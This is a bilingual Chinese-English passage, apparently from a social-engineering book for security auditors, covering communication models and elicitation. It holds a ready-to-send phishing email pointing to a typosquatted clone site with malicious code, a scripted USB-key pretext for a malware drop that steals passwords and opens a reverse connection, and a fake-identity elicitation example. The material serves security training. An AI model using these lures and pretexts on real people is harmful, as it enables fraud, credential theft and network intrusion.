Each person has both a physical and a mental personal space. You allow or disallow people to enter that space or get close to you depending on many factors. When communicating with a person in any fashion, you are trying to enter their personal space. As a social engineer communicates they are trying to bring someone else into their space and share that personal reality. Effective communication attempts to bring all participants into each other’s mental location. This happens with all interactions, but because it is so common people do it without thinking about it.

 

在人际交流中,信息传递分为两个层次:口头的和非口头的。

In interpersonal communications two layers of messages are being sent: verbal and nonverbal.

 

交流通常包含口头或语言部分,无论是口头、书面还是表达方式。它通常还包含非语言部分 — 面部表情、肢体语言或一些非语言信息,如表情符号或字体。

Communication usually contains a verbal or language portion, whether it is in spoken, written, or expressed word. It also usually has a nonverbal portion—facial expressions, body language, or some non-language message like emoticons or fonts.

 

无论每种提示(口头或非口头)的数量如何,这个通信数据包都会发送给接收者,然后通过她的个人现实进行过滤。她将根据自己的现实形成一个概念,然后在此基础上开始解释这个数据包。当接收者破译这条消息时,她开始解读它的含义,即使这个含义不是发送者的本意。如果接收者回复一个通信数据包来表明她接受或拒绝原始数据包,发送者就会知道他的数据包是否按照他想要的方式被接收。

Regardless of the amount of each type of cue (verbal or nonverbal), this communication packet is sent to the receiver and then filtered through her personal reality. She will form a concept based on her reality, then based on that will start to interpret this packet. As the receiver deciphers this message she begins to unscramble its meaning, even if that meaning is not what the sender intended. The sender will know whether his packet is received the way he intended if the receiver gives a communication packet in return to indicate her acceptance or denial of the original packet.

 

这里的数据包是沟通的形式:发送的单词、信件或电子邮件。当接收者收到信息时,她必须对其进行解读。许多因素取决于如何解读信息。她的心情是好还是坏,是快乐、悲伤、愤怒还是富有同情心——所有这些以及改变她感知的其他线索都将帮助她解读该信息。

Here the packet is the form of communication: the words or letters or emails sent. When the receiver gets the message she has to decipher it. Many factors depend on how it is interpreted. Is she in a good mood, bad mood, happy, sad, angry, compassionate—all of these things as well as the other cues that alter her perception will help her to decipher that message.

 

社会工程师的目标必须是利用口头和非口头暗示来改变目标的看法,从而达到社会工程师所期望的影响。

The social engineer’s goal has to be to give both the verbal and nonverbal cues the advantage to alter the target’s perception so as to have the impact the social engineer desires.

 

一些更基本的沟通规则包括:

Some more basic rules for communication include the following:

 
 
     
  • 永远不要想当然地认为接收者与你有同样的现实。
  • Never take for granted that the receiver has the same reality as you.
  •  
     
  • 永远不要想当然地认为接收者会按照信息原本的意思去解读它。
  • Never take for granted that the receiver will interpret the message the way it was intended.
  •  
     
  • 沟通并不是绝对的、有限的事。
  • Communication is not an absolute, finite thing.
  •  
     
  • 始终假设交流中涉及不同的人,因此存在着尽可能多的不同现实。
  • Always assume as many different realities exist as there are different people involved in the communication.
  •  
 

了解这些规则可以大大提高良好和有用的沟通能力。这一切都很好,但沟通与开发模型有什么关系?更重要的是,它与社会工程学有什么关系?

Knowing these rules can greatly enhance the ability for good and useful communications. This is all good and great but what does communication have to do with developing a model? Even more, what does it have to do with social engineering?

 

沟通模式及其根源

The Communication Model and Its Roots

 

正如已经确定的,沟通基本上意味着向预期接收者发送一包信息。信息可能来自许多来源,如视觉、声音、触觉、嗅觉和文字。然后,目标处理该包,并用它来描绘“所说的内容”的整体画面。这种评估方法称为沟通过程。这个过程最初由社会科学家克劳德·香农和沃伦·韦弗于 1947 年概述,当时他们开发了香农-韦弗模型,也被称为“所有模型之母”。

As already established, communication basically means sending a packet of information to an intended receiver. The message may come from many sources like sight, sound, touch, smell, and words. This packet is then processed by the target and used to paint an overall picture of “What’s being said.” This method of assessment is called the communication process. This process was originally outlined by social scientists Claude Shannon and Warren Weaver in 1947, when they developed the Shannon-Weaver model, also known as “the mother of all models.”

 

根据维基百科,香农-韦弗模型“体现了信息源、消息、发射机、信号、信道、噪声、接收机、信息目的地、错误概率、编码、解码、信息速率、[和]信道容量等概念”等。

The Shannon-Weaver model, according to Wikipedia, “embodies the concepts of information source, message, transmitter, signal, channel, noise, receiver, information destination, probability of error, coding, decoding, information rate, [and] channel capacity,” among other things.

 

Shannon和Weaver用图形定义了这个模型,如图2-8所示。

Shannon and Weaver defined this model with a graphic, as shown in Figure 2-8.

 

在简单模型(也称为传输模型)中,信息或内容以某种形式从发送者发送到目的地或接收者。这种常见的通信概念只是将通信视为发送和接收信息的一种方式。该模型的优势在于其简单性、通用性和可量化性。

In a simple model, also known as the transmission model, information or content is sent in some form from a sender to a destination or receiver. This common concept of communication simply views communication as a means of sending and receiving information. The strengths of this model are its simplicity, generality, and quantifiability.

 

图 2-8:香农-韦弗“模型之母”。

Figure 2-8: The Shannon-Weaver “mother of all models.”

 
f0208.eps
 

Shannon 和 Weaver 基于以下基础构建了此模型:

Shannon and Weaver structured this model based on:

 
 
     
  • 产生消息的信息源
  • An information source, which produces a message
  •  
     
  • 发射器,将信息编码成信号
  • A transmitter, which encodes the message into signals
  •  
     
  • 适合传输信号的通道
  • A channel, to which signals are adapted for transmission
  •  
     
  • 接收器,从信号中“解码”(重建)信息
  • A receiver, which “decodes” (reconstructs) the message from the signal
  •  
     
  • 消息到达的目的地
  • A destination, where the message arrives
  •  
 

他们认为该理论中存在三个层次的沟通问题:

They argued that three levels of problems for communication existed within this theory:

 
 
     
  • 技术问题——信息传递的准确度如何?
  • The technical problem—How accurately can the message be transmitted?
  •  
     
  • 语义问题——含义传达得有多精确?
  • The semantic problem—How precisely is the meaning conveyed?
  •  
     
  • 有效性问题——接受到的含义对行为的影响有多有效?(最后一点对于社会工程学来说很重要。社会工程师的整个目标是创造社会工程师想要的行为。)
  • The effectiveness problem—How effectively does the received meaning affect behavior? (This last point is important to remember for social engineering. The whole goal of the social engineer is to create a behavior that the social engineer wants.)
  •  
 

大约 15 年后,戴维·贝罗 (David Berlo) 扩展了香农和韦弗的线性通信模型,并创建了发送者-消息-通道-接收者 (SMCR) 通信模型。SMCR 将模型分为明确的部分,如图2-9所示。

Almost 15 years later, David Berlo expanded on Shannon and Weaver’s linear model of communication and created the Sender-Message-Channel-Receiver (SMCR) model of communication. SMCR separated the model into clear parts, as shown in Figure 2-9.

 

图 2-9: Berlo 模型。

Figure 2-9: The Berlo model.

 
f0209.eps
 

您可以将通信视为受三个层次的规则支配的信息传输过程:

You can think of communication as processes of information transmission governed by three levels of rules:

 
 
     
  • 符号和象征的形式属性
  • Formal properties of signs and symbols
  •  
     
  • 符号/表达与其使用者之间的关系
  • The relations between signs/expressions and their users
  •  
     
  • 符号和象征之间的关系以及它们所代表的含义
  • The relationships between signs and symbols and what they represent
  •  
 

因此,您可以进一步细化通信的定义,即社会互动,其中至少两个交互代理共享一组共同的符号和一组共同的规则。

Therefore, you can further refine the definition of communication as social interaction where at least two interacting agents share a common set of signs and a common set of rules.

 

2008 年,另一位研究人员 DC Balmund 将他之前的许多同事的研究与他自己的研究相结合,开发了沟通的交互模型,如图2-10所示。

In 2008 another researcher, D. C. Balmund, combined the research of many of his previous cohorts with his own and developed the transactional model of communication, as shown in Figure 2-10.

 

在这个模型中,你可以看到渠道和信息可以采取多种形式,而不仅仅是图片所示的口头形式。信息可以是书面、视频或音频形式,接收者可以是一个人或多个人。反馈也可以采取多种形式。

In this model you can see that the channel and message can take on many forms, not just spoken, as represented by the picture. The message can be in written, video, or audio form and the receiver can be one person or many people. The feedback also can take on many forms.

 

结合并分析这项研究可以帮助社会工程师开发出可靠的沟通模式。不仅社会工程师可以从中受益,每个人都可以受益。学习如何制定沟通计划可以改善你与配偶、孩子、雇主或员工(任何与你交流的人)打交道的方式。

Combining and analyzing this research can help a social engineer develop a solid communication model. Not only social engineers can benefit from doing this—everyone can. Learning how to develop a plan of communication can enhance the way you deal with your spouse, your kids, your employer or employees—anyone you communicate with.

 

图 2-10:新的和改进的通信模型。

Figure 2-10: The new and improved communication model.

 
f0210.eps
 

因为本书的重点是社会工程师,所以你需要分析社会工程师能从所有这些中得到什么。读完所有这些理论后,你可能会开始想知道这些理论可以如何使用。请记住,社会工程师必须是沟通大师。他们必须能够有效地进入并留在一个人的个人和心理空间,而不会冒犯或激怒目标。开发、实施和实践有效的沟通模式是实现这一目标的关键。下一步是开发沟通模型。

Because the focus of this book is social engineers, you need to analyze what a social engineer can take away from all of this. After reading all this theory you may begin to wonder how this can be used. Remember, a social engineer must be a master at communication. They must be able to effectively enter into and remain in a person’s personal and mental space and not offend or turn off the target. Developing, implementing, and practicing effective communication models is the key to accomplishing this goal. The next step then is developing a communication model.

 

开发沟通模型

Developing a Communication Model

 

现在您已经了解了通信模型的关键要素,请从社会工程师的角度来看待它们:

Now that you know about the key elements of a communication model, take a look at them from the eyes of a social engineer:

 
 
     
  • 来源:社会工程师是所要传递的信息或通信的来源。
  • The Source: The social engineer is the source of the information or communication that is going to be relayed.
  •  
     
  • 渠道:这是交付的方法。
  • The Channel: This is the method of delivery.
  •  
     
  • 信息:可能信息中最重要的部分就是你要向接收者说什么。
  • The Message: Probably the biggest part of the message is knowing what you are going to say to the receiver(s).
  •  
     
  • 接收者:这是目标。
  • The Receiver(s): This is the target.
  •  
     
  • 反馈:在您有效地与他们沟通后,您希望他们做什么?
  • The Feedback: What do you want them to do after you effectively give them the communication?
  •  
 

如何有效地使用这些元素?进入通信建模世界的第一步是从您的目标开始。尝试处理几个可能属于典型社会工程学场景的场景:

How can you use these elements effectively? The first step into the world of communication modeling is starting with your goal. Try working with a couple of the scenarios that might be part of a typical social engineering gig:

 
 
     
  • 开发针对 25-50 名员工的网络钓鱼电子邮件,并试图让他们在工作时间访问非商业网站,该网站将嵌入恶意代码以侵入他们的网络。
  • Develop a phishing email targeted against 25–50 employees and attempt to have them go during work hours to a non-business website that will be embedded with malicious code to hack into their networks.
  •  
     
  • 进行现场访问,扮演一个潜在的面试者,他刚刚把咖啡洒在了简历上,毁了简历,需要说服前台人员允许将 USB 密钥插入计算机以打印简历副本。
  • Make an onsite visit to portray a potential interviewee who has just ruined his resume by spilling coffee on it and needs to convince the front-desk person to allow a USB key to be inserted into a computer to print a copy of the resume.
  •  
 

当制定沟通策略时,您可能会发现以相反的顺序开展模型是有益的。

When developing a communication strategy you may find working on the model in reverse order to be beneficial.

 
 
     
  • 反馈:您希望得到什么样的反馈?您希望收到此电子邮件的大多数员工点击此邮件。这是理想情况;当然,您可能只需要少数人甚至一个人就足够了,但目标(期望的反馈)是让大多数目标点击钓鱼链接。
  • Feedback: What is your desired response? The desired response is to have the majority of the employees you send this email to click on it. That is ideal; of course, you might be happy with just a handful or even one, but the goal, the desired feedback, is to have the majority of targets click on the phishing link.
  •  
     
  • 接收者:这时您的信息收集技能就派上用场了。您需要了解目标的所有信息。他们喜欢运动吗?他们以男性为主还是女性为主?他们是当地俱乐部的成员吗?他们业余时间做什么?他们有家庭吗?他们年龄大还是小?这些问题的答案可以帮助社会工程人员决定发送什么类型的消息。
  • Receivers: This is where your information gathering skills come in handy. You need to know all about the targets. Do they like sports? Are they predominantly male or female? Are they members of local clubs? What do they do in their off time? Do they have families? Are they older or younger? The answers to these questions can help the social engineer decide what type of message to send.
  •  
     
  • 信息:如果目标主要是 25-40 岁的男性,其中少数人是梦幻足球或篮球联赛的成员,您的目标可能会点击有关体育、女性或体育赛事的链接。开发电子邮件的内容至关重要,但语法、拼写和标点符号也非常重要。过去,网络钓鱼电子邮件的最大提示之一就是拼写错误。
  • Message: If the target is predominantly 25–40-year-old males, with a few being part of a fantasy football or basketball league, your targets may click on a link about sports, women, or a sporting event. Developing the email’s content is essential, but also grammar, spelling, and punctuation are very important to consider. One of the biggest tip-offs to phishing emails in the past has been the bad spelling.
  •  
 

收到这样的电子邮件:“单击此处并输入您的密码以验证您的帐户设置”,这完全表明这是一封不合法的电子邮件。您的电子邮件必须合法,拼写正确,并且提供符合目标的有吸引力的优惠。即使目标相同,信息也会根据性别、年龄和许多其他因素而变化。如果目标主要是女性,同样的电子邮件可能会失败。
 
     
  • 渠道:这个元素的答案很简单,因为您已经知道这将是一封电子邮件。
  •  
     
  • 来源:同样,这个要素是显而易见的,因为你,社会工程师,就是来源。你的可信度取决于你作为社会工程师的技能水平。
  •  
 

Getting an email that reads like this: “Click here and enter ur pasword to verify ur account settings,” is a dead giveaway to its being a non-legitimate email. Your email must be legit with good spelling and an appealing offer that fits the target. Even with the same goal the message will change depending on gender, age, and many other factors. The same email would probably fail if the targets were predominately female.
 
     
  • Channel: This answer to this element is easy, because you already know it is going to be an email.
  •  
     
  • Source: Again, this element is a no-brainer, because you, the social engineer, are the source. How believable you are depends on your skill level as a social engineer.
  •  
 

 

场景一:钓鱼邮件

Scenario One: Phishing Email

 

目标是 45 名年龄在 25 至 45 岁之间的男性。在这 45 名目标中,有 24 名来自同一个梦幻篮球联盟。他们每天都会去一个网站 ( www.myfantasybasketballleague.com)注册他们的选择。论坛上的帖子证实了这一点。

The targets are 45 males ranging from the age of 25 to 45. Out of the 45 targets, 24 are in the same fantasy basketball league. They all go daily to a site (www.myfantasybasketballleague.com) to register their picks. This is verified by posts on the forums.

 

目标是将他们引导到一个可用的、现在由您拥有的网站,www.myfantasybasketballeague.com,这是一个小小的拼写错误。该网站是他们访问的网站的克隆,但有一个变化——它有一个嵌入式 iframe。页面中央将有一个登录按钮,点击后会将他们带回真正的网站。加载和点击的延迟将为代码提供入侵其系统所需的时间。

The goal is to drive them to a site that is available and that you now own, www.myfantasybasketballeague.com, which is a slight misspelling. This site is a clone of the site they visit with one change—it has an embedded iframe. There will be a Login button in the center of the page that when clicked, brings them back to the real site. The delay in loading and clicking will give the code the time it needs to hack their systems.

 

你会如何撰写电子邮件?以下是我撰写的示例:

How would you write the email? Here is a sample that I wrote:

 

你好,

Hello,

 

My Fantasy Basket Ball League 有一些令人兴奋的消息。我们添加了一些额外的功能,让您可以更好地控制您的选择,以及一些特殊功能。我们正在努力为所有会员提供这些功能,但可能会收取一些额外的服务费。

We have some exciting news at My Fantasy Basket Ball League. We have added some additional features that will allow you more control over your picks as well as some special features. We are working hard on offering this to all of our members but some additional service fees may apply.

 

我们很高兴地宣布,前 100 名登录的用户将免费获得这项新服务。单击此链接进入特殊页面,单击页面上的灰色登录按钮,然后登录即可将这些功能添加到您的帐户中。www.myfantasybasketballeague.com

We are excited to say that the first 100 people to log in will get this new service for free. Click this link to be taken to the special page, click the gray LOGIN button on the page, and log in to have these features added to your account. www.myfantasybasketballeague.com

 

谢谢,

Thanks,

 

MFBB 团队

The MFBB Team

 

这封电子邮件很可能会让至少 24 名联盟现有会员产生足够兴趣,点击链接,查看网站并免费试用这些新功能。

This email would mostly likely get at least the 24 who are already in the league interested enough to click the link and check out the site and try these new features for free.

 

分析该电子邮件。首先,它包含一个可以吸引该梦幻联盟现有成员的优惠。他们中的许多人意识到该优惠仅限于前 100 名,因此他们会在收到电子邮件后立即点击它,这很可能是出于工作需要。电子邮件引导他们访问的网站包含恶意代码,尽管大多数人都会成为受害者,但恶意社交工程师只需要一个受害者。

Analyze that email. First, it contains an offer that would attract the present members of that fantasy league. Many of them realize the offer is limited to only the first 100, so they would click on it soon as they get the email, which more than likely is at work. The site that the email drives them to has the malicious code and although the majority will fall victim, all the malicious social engineer needs is one victim.

 

还要注意的是,这封电子邮件的语法和拼写都很好,有吸引人的吸引力,并且有足够的动机让人快速点击。这是一封基于可靠沟通模型的完美电子邮件。

Also notice that the email contains good grammar and spelling, an enticing hook, and enough motivation to click quickly. It is a perfect email based off a solid communication model.

 

场景二:USB Key

Scenario Two: USB Key

 

现场情况有点难做,因为是面对面的。你只能在现场“伪装”你的身份。在这种情况下,请记住,你必须记住所有这些细节,因为你不能拿出提示卡来使用。同样重要的是要记住,我们往往只有一次机会给人留下印象。如果我们做得不好,可能会毁了接下来的演出。

The onsite scenario is a little more difficult to do because it is in person. You can only do so much to “spoof” your identity in person. In this scenario remember that you must have all these details in memory because you can’t be pulling out and using cue cards. It is also important to remember that oftentimes we have only one chance to make an impression. If we do a bad job at it, it can ruin the rest of the gig.

 
 
     
  • 反馈:此场景的目标是让前台接待员接受您的装有恶意程序的 USB 驱动器。该程序将自动加载并从她的系统中抓取所有信息,例如用户名、密码、电子邮件帐户、包含系统上所有密码的 SAM 文件等,并将其全部复制到 USB 驱动器上的目录中。它还会从接待员的机器到您的服务器建立反向连接,让您可以访问她的机器,并希望可以访问网络。我喜欢使用 Metasploit 框架或与 Metasploit 结合使用的社会工程工具包(参见第 7 章)。Metasploit 在其受害者身上执行漏洞代码,并且它有一个名为 Meterpreter 的内置处理程序。用户可以编写许多脚本,例如从受害者的机器上进行键盘记录、屏幕截图和侦察。
  • Feedback: The goal with this scenario is to get the front desk receptionist to accept your USB drive that has a malicious program on it. The program will auto load and scrape her system for all information, such as usernames, passwords, email accounts, SAM files that contain all the passwords on the system, and more, copying it all to a directory on the USB drive. It also creates a reverse connection from the receptionist’s machine to your servers, giving you access to her machine and hopefully the network. I am fond of using the Metasploit framework or the Social Engineering Toolkit (see Chapter 7) that ties in with Metasploit. Metasploit executes exploit code on its victims and it has a built-in handler called Meterpreter. The user can script many things like keylogging, screenshots, and recon from the victim’s machines.
  •  
     
  • 接收者:确定一个真正的目标可能很棘手,因为如果你的目标不接受这个想法,你的计划就会泡汤。你必须热情、友好、有说服力。这也必须快速完成,因为时间太长会让怀疑产生。但如果你行动太快,你可能会引起怀疑和恐惧,从而扼杀你的机会。必须实现完美的平衡。
  • Receivers: Having one true target can be tricky because if your target is unreceptive to the idea, your plan is shot. You must be warm, friendly, and convincing. This must be done fast, too, because too much time will allow doubt to set in. But if you move too fast you can cause doubt and fear, killing your chances. A perfect balance must be accomplished.
  •  
     
  • 信息:因为您是亲自传递信息,所以信息必须清晰简洁。基本情况是,您在报纸上看到了招聘数据库管理员的广告,然后打电话与人力资源部人员黛比交谈。她说她今天已经预约满了,但您应该顺便去她那里寄一份简历让她审阅,然后在周末与她见面。当您开车过来时,一只松鼠跑了出来,导致您猛踩刹车,导致咖啡从咖啡杯中流出并洒在您的包里,毁了您的简历和其他东西。无论如何,您还有另一个约会,但您真的需要这份工作,不知道她是否会从您的 USB 驱动器中为您打印一份新副本。
  • Message: Because you’re delivering the message in person, it must be clear and concise. The basic story is that you saw the ad in the paper for a database administrator and you called in and spoke to Debbie, the HR person. She said she was booked today but you should stop in and drop off a resume for her review and then meet her at the end of the week. While you were driving over, a squirrel ran out, causing you to slam on the brakes and causing your coffee to come out of the holder and spill in your bag, ruining your resumes and other stuff. Anyhow, you have another appointment but really need this job and wonder whether she would print you a fresh copy from your USB drive.
  •  
     
  • 渠道:您将亲自使用口头、面部和肢体语言进行交流。
  • Channel: You are going in person using verbal, facial, and body language communication.
  •  
     
  • 来源:再说一遍,这就是你作为社会工程师的表现,除非你有充分的理由站出来。
  • Source: Again, this is you as the social engineer, unless you have a good reason to have a stand in.
  •  
 

拿着沾满咖啡渍的文件夹和一些湿纸有助于推销故事。看起来垂头丧气、没有男子气概也有助于推销故事。礼貌地和她说话,不要说脏话,这样她会喜欢你,甚至同情你。USB 密钥应包含一个名为 myresume.doc 或 myresume.pdf 的文件,并且可打印。PDF 是最常用的格式,因为大多数公司都在运行旧版本的 Adob​​e Reader,该版本容易受到多种不同攻击。确保简历的格式允许大多数人打开,而不是某种奇怪的格式。

Holding a coffee-stained folder with some wet papers in it can help sell the story. Looking dejected and not alpha-male-ish can also help sell it. Politely speaking to her and not using foul language will help her feel a liking to you and maybe even some pity. The USB key should contain a file called myresume.doc or myresume.pdf and be printable. PDFs are the most commonly used formats since most companies are running an older version of Adobe Reader that is vulnerable to many different exploits. Make sure the resume is in a format that allows for the most people to be able to open it—not some odd format.

 

大多数时候,人们都想提供帮助。如果故事可信且令人心碎,他们就希望能够帮助处于困境中的人。如果你真的缺乏社会工程师的同情心,你可以对故事进行改编:今天在我去学校的路上,轮到我送女儿上学了。当她爬过座位给我一个吻别时,她把我的咖啡打翻在了我的包里。我已经迟到了,离这里比离家更近;你能给我打印一份新的吗?

Most of the time people want to help. They want to be able to assist a person in distress if the story is believable as well as heart wrenching. For a special twist if you really lack a heart as a social engineer, you can put a spin on the story: On my way over, it was my turn today to drop my daughter off at school. When she climbed over the seat to give me a kiss goodbye she knocked over my coffee into my bag. I was already running late and closer to here than home; could you print me a fresh copy?

 

不管怎样,这种方法通常都会奏效,会导致 USB 密钥插入计算机,并且很可能会彻底攻破接待员的计算机,从而导致公司彻底沦陷。

Either way, this story usually works and will lead to the USB key being inserted into the computer and most likely a complete compromise of the receptionist’s computer, which can lead to a total compromise of the company.

 

沟通模式的力量

The Power of Communication Models

 

沟通建模是一种强大的工具,是每个社交工程师必备的技能。沟通建模最难的部分是确保你的信息收集会话是可靠的。

Communication modeling is a powerful tool that is a must-have skill for every social engineer. The hardest part about communication modeling is to ensure your information-gathering sessions are solid.

 

在前面两种情况下,没有好的计划和模型都会导致失败。练习沟通建模的一个好方法是写出一个模型,用于操纵你熟悉的人——丈夫、妻子、父母、孩子、老板或朋友——做你想做的事,采取你希望的行动。

In both of the earlier scenarios, not having a good plan and model will lead to failure. A good way to practice communication modeling is to write out a model for manipulating people you know well—a husband, wife, parent, child, boss, or friend—to do something you want, to take some action you desire.

 

设定一个目标,不要带有恶意,例如让某人同意去另一个度假地点,或者去你喜欢但你的伴侣讨厌的餐厅,或者允许你花一些钱买一些你通常不会要求的东西。无论你想出什么,写下五个沟通要素,然后看看当你有书面计划时沟通效果如何。你会发现,明确定义目标后,你可以更好地测试你的社交工程沟通方法,并能够更轻松地实现目标。列出以下五点并逐一填写,并在进行过程中将点连接起来。

Set a goal, nothing malicious, such as getting someone to agree to a different vacation spot or a to go to a restaurant you love and your partner hates, or to allow you to spend some money on something you normally wouldn’t ask for. Whatever it is you come up with, write out the five communication components and then see how well the communication goes when you have a written plan. You will find that with your goals clearly defined, you can better test your social engineering communication methods, and be able to achieve your goals more easily. List the following five points and fill them out one by one, connecting the dots as you go along.

 
 
     
  • 来源
  • Source
  •  
     
  • 信息
  • Message
  •  
     
  • 渠道
  • Channel
  •  
     
  • 接收器
  • Receivers
  •  
     
  • 反馈
  • Feedback
  •  
 

沟通建模会产生非常有价值的信息,如果没有这些信息,大多数沟通对于社会工程师来说都不会成功。如前所述,信息收集是每项社会工程工作的关键,但如果你精通信息收集,并且能够收集大量数据,但不知道如何使用,那就太浪费了。

Communication modeling yields very valuable information and without it, most communication will not be successful for a social engineer. As previously mentioned, information gathering is the crux of every social engineering gig, but if you become proficient at information gathering and you are able to gather amazing amounts of data but don’t know how to use it, it is a waste.

 

学会成为信息收集大师,然后通过沟通模型将其付诸实践。这只是开始,但它确实可以改变你作为社会工程师和在日常生活中与人打交道的方式。然而,在沟通模型中开发可靠的信息还有很多事情要做。

Learn to become a master at information gathering and then practice putting that into action with communication modeling. This is just the start, but it can literally change the way you deal with people both as a social engineer and in everyday contexts. Yet so much more goes into developing a solid message in the communication model.

 

学习如何沟通、如何操纵以及如何成为一名社会工程师的一个关键方面是学习如何使用问题,如下一章所述。

One key aspect of learning how to communicate, how to manipulate, and how to be a social engineer is learning how to use questions, as discussed in the next chapter.

 

第3章

Chapter 3

 

引出

Elicitation

 

战争的最高法则是不战而屈人之兵。

The supreme art of war is to subdue the enemy without fighting.

 

—孙子

—Sun Tzu

 

能否有效地引诱他人说出心声是社交工程师成败的关键。当人们看到你并与你交谈时,他们应该感到轻松自在并愿意敞开心扉。

Being able to effectively draw people out is a skill that can make or break a social engineer. When people see you and talk to you they should feel at ease and want to open up.

 

你是否曾经遇到过某个人,然后立刻觉得“哇,我喜欢这个人”?为什么?他身上有什么让你有这种感觉?是他的笑容?他的外表?他对待你的方式?他的肢体语言?

Have you ever met someone and instantly felt, “Wow I like that person”? Why? What was it about him that made you feel that way? Was it his smile? The way he looked? The way he treated you? His body language?

 

也许他甚至似乎与你的想法和愿望“合拍”。他看你的眼神不带任何评判,你立刻就感到和他在一起很自在。

Maybe he even seemed to be “in tune” with your thoughts and desires. The way he looked at you was non-judgmental and right away you felt at ease with him.

 

现在想象一下,您可以利用这一点并掌握这种能力。不要将本章视为简单的“如何建立融洽关系”课程。本章是关于诱导的,这是间谍、骗子和社会工程师以及医生、治疗师和执法人员使用的一种强大技术,如果您想受到保护或成为一名出色的社会工程审计员,那么您需要掌握这项技能。有效使用诱导可以产生惊人的效果。

Now imagine you can tap into that and master that ability. Don’t shrug off this chapter as a simple “how to build rapport” lesson. This chapter is about elicitation, a powerful technique used by spies, con men, and social engineers, as well as doctors, therapists, and law enforcement, and if you want to be protected or be a great social engineer auditor then you need to master this skill. Used effectively, elicitation can produce astounding results.

 

什么是诱导?社会工程学中很少有像诱导这样强大的方面。这就是它位于框架顶部的原因之一。仅凭这项技能就可以改变人们对你的看法。从社会工程学的角度来看,它可以改变你实践安全的方式。本章剖析了专家诱导的例子,并深入探讨了如何在社会工程学环境中利用这一强大的技能。

What is elicitation? Very few aspects of social engineering are as powerful as elicitation. This is one of the reasons it is near the top of the framework. This skill alone can change the way people view you. From a social engineering standpoint, it can change the way you practice security. This chapter dissects examples of expert elicitation and delves deep into how to utilize this powerful skill in a social engineering context.

 

在深入之前,您必须从基础开始。

Before getting in too deep, you must begin with the basics.

 

什么是诱导?

What Is Elicitation?

 

诱导是指通过逻辑得出或得出结论(例如,真相)。或者,它被定义为一种 唤起(或引出)特定行为类别的刺激,例如“诱导他的证词并不容易”。

Elicitation means to bring or draw out, or to arrive at a conclusion (truth, for instance) by logic. Alternatively, it is defined as a stimulation that calls up (or draws forth) a particular class of behaviors, as in “the elicitation of his testimony was not easy.”

 

再读一遍这个定义,如果它没有让你起鸡皮疙瘩,那么你可能有问题了。想想这意味着什么。能够有效地使用诱导意味着你可以设计问题来吸引人们并刺激他们采取你希望的行为方式。作为一名社会工程师,这意味着什么?有效地诱导意味着你可以以一种方式来设计你的话语和问题,从而将你的技能水平提升到一个全新的水平。在信息收集方面,专家诱导可以转化为你的目标想要回答你的每一个要求。

Read that definition again and if it doesn’t give you goose bumps you may have a problem. Think about what this means. Being able to effectively use elicitation means you can fashion questions that draw people out and stimulate them to take a path of a behavior you want. As a social engineer, what does this mean? Being effective at elicitation means you can fashion your words and your questions in such a way that it will enhance your skill level to a whole new level. In terms of information gathering, expert elicitation can translate into you target wanting to answer your every request.

 

我想更进一步地讨论这个问题,因为许多政府都教育并警告其员工不要进行诱导,因为全世界的间谍都使用这种方法。

I want to take this discussion one step further because many governments educate and warn their employees against elicitation because it is used by spies all over the earth.

 

美国政府国家安全局在培训材料中将诱导定义为“在看似正常、无辜的对话过程中巧妙地提取信息”。

In training materials, the National Security Agency of the United States government defines elicitation as “the subtle extraction of information during an apparently normal and innocent conversation.”

 

这些对话可以发生在目标所在的任何地方——餐厅、健身房、托儿所——任何地方。诱导很有效,因为它风险低,而且通常很难被发现。大多数时候,目标根本不知道信息泄露来自何处。即使怀疑存在某种不良意图,人们也可以很容易地将其视为一个愤怒的陌生人仅仅因为问了一个问题而被指控犯有错误。

These conversations can occur anywhere that the target is—a restaurant, the gym, a daycare—anywhere. Elicitation works well because it is low risk and often very hard to detect. Most of the time, the targets don’t ever know where the information leak came from. Even if a suspicion exists that there is some wrong intent, one can easily pass it off as an angry stranger being accused of wrong doing for just asking a question.

 

诱导法之所以如此有效,有以下几个原因:

Elicitation works so well for several reasons:

 
 
     
  • 大多数人都有礼貌的愿望,尤其是对陌生人。
  • Most people have the desire to be polite, especially to strangers.
  •  
     
  • 专业人士希望表现出见多识广、聪明伶俐。
  • Professionals want to appear well informed and intelligent.
  •  
     
  • 如果你受到赞扬,你往往会说得更多,透露得更多。
  • If you are praised, you will often talk more and divulge more.
  •  
     
  • 大多数人不会为了说谎而说谎。
  • Most people would not lie for the sake of lying.
  •  
     
  • 大多数人都会对那些关心他们的人做出善意的回应。
  • Most people respond kindly to people who appear concerned about them.
  •  
 

大多数人的这些关键因素是诱导如此有效的原因。让人们谈论他们的成就太容易了。

These key factors about most humans are why elicitation works so well. Getting people to talk about their accomplishments is too easy.

 

有一次,我被派去收集一家公司的情报,我在当地商会的一次活动中遇到了我的目标人物。因为那是一个聚会,所以我一直等到看到目标人物朝酒吧走来。我们同时到达那里,而且由于这些活动的目的是结识新朋友并交换名片,所以我的第一步并没有采取极端行动。

In one scenario in which I was tasked to gather intel on a company, I met my target at a local chamber of commerce function. Because it was a mixer I hung back until I saw the target approaching the bar. We got there at the same time and because the purpose of these functions is to meet and greet people and exchange business cards, my first move wasn’t extreme.

 

我说:“逃离秃鹫?”

I said, “Escaping from the vultures?”

 

他笑着回答道:“是啊,这就是让这些事情值得花时间的原因——开放式酒吧。”

He replied with a chuckle, “Yeah, this is what makes these things worth the time—open bar.”

 

我听他点了酒,也点了一杯类似的饮料。我伸出手,探过身子说:“保罗·威廉姆斯。”

I listened to him order, and I ordered a similar drink. I lean over with my hand out, and said, “Paul Williams.”

 

“拉里·史密斯。”

“Larry Smith.”

 

我拿出一张网上订购的名片。“我在一家小进口公司担任采购主管。”

I pulled out a business card I had ordered online. “I work with a little import company as the head of purchasing.”

 

他一边递给我名片一边说道:“我是 XYZ 公司的首席财务官。”

He said as he handed me his card, “I am the CFO for XYZ.”

 

我笑着回答道:“你很有钱,所以大家都在追着你。你们到底是做什么的?”

With a chuckle I responded, “You’re the guy with the bucks—that’s why everyone is after you out there. What exactly do you guys do?”

 

他开始讲述他公司产品的一些细节,当他列举出一种众所周知的产品时,我说:“哦,对了,你们制造了那个小部件;我喜欢那个东西。我在XYZ 杂志上看到它为你们创造了新的销售记录。”从我之前收集的信息中,我知道他对那种设备很感兴趣,所以我的赞扬得到了热烈的回应。

He bagan to relate a few details of his company’s products, and when he listed one that is well known, I said, “Oh right, you guys make that widget; I love that thing. I read in XYZ Magazine it hit a new sales record for you guys.” From my previous information gathering I knew he had personal interest in that device so my praise was well received.

 

他开始挺起胸膛。“你知道吗,这款设备第一个月的销量比我们前后五款产品的总销量还多?”

